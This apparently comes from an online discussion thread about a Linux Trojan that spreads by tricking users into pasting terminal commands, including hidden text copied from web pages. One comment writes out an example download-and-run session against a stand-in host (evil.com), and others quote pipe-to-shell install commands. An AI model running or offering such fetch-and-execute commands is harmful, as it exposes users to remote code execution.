5 ms·
The articles call it a "Trojan", so I expect they trick people into installing it.
by elwin 13y ago
The articles call it a "Trojan", so I expect they trick people into installing it.
- dobbsbob 13y agoIt tricks users who blindly cut+paste console commands.
- jlgreco 13y agoYet another reason why command line literacy is important, even with "polished" distros. (Particularly if those polished distros have a habit of removing GUI configuration in the name of "simplification", pushing users to forums to find fixes that they can paste into their terminal...)
- gizmo686 13y agoEven command line literate people can fall victim to copy and paste exploits. If you are copying from a non-trusted website, you might be tempted to read the code that you are copying, decide that it is safe, and copy it. The problem is that with HTML, it is possible that the website could make you copy something in addition to what you actually see, and therefore still be able to execute arbitrary code even though you 'audited' it before hand.
- jessaustin 13y agoI suspect that most people who can find the console will notice what's going on with a session like this: $ wget evil.com/trojan $ chmod +x trojan $ ./trojan Maybe it's more likely to hit those who double-click unwisely?
- michael_h 13y agoNot neccessarily: http://thejh.net/misc/website-terminal-copy-paste http://thejh.net/misc/website-terminal-copy-paste
- olefoo 13y agoRemember that a year or two ago all of the public instructions for installing nodejs were of the form. sudo wget http://example.com/node/install.sh | sh so it's not like it's only newbies who blindly run scripts as root.
- hamoid 13y agoSimilar to how Meteor is installed: curl https://install.meteor.com https://install.meteor.com | /bin/sh After downloading it asks for your password.
- deleted 13y ago[deleted]
- jessaustin 13y agoHahaha if it's in the repo then we DO have problems... Although presumably someone who could write there could just corrupt a package everyone already has?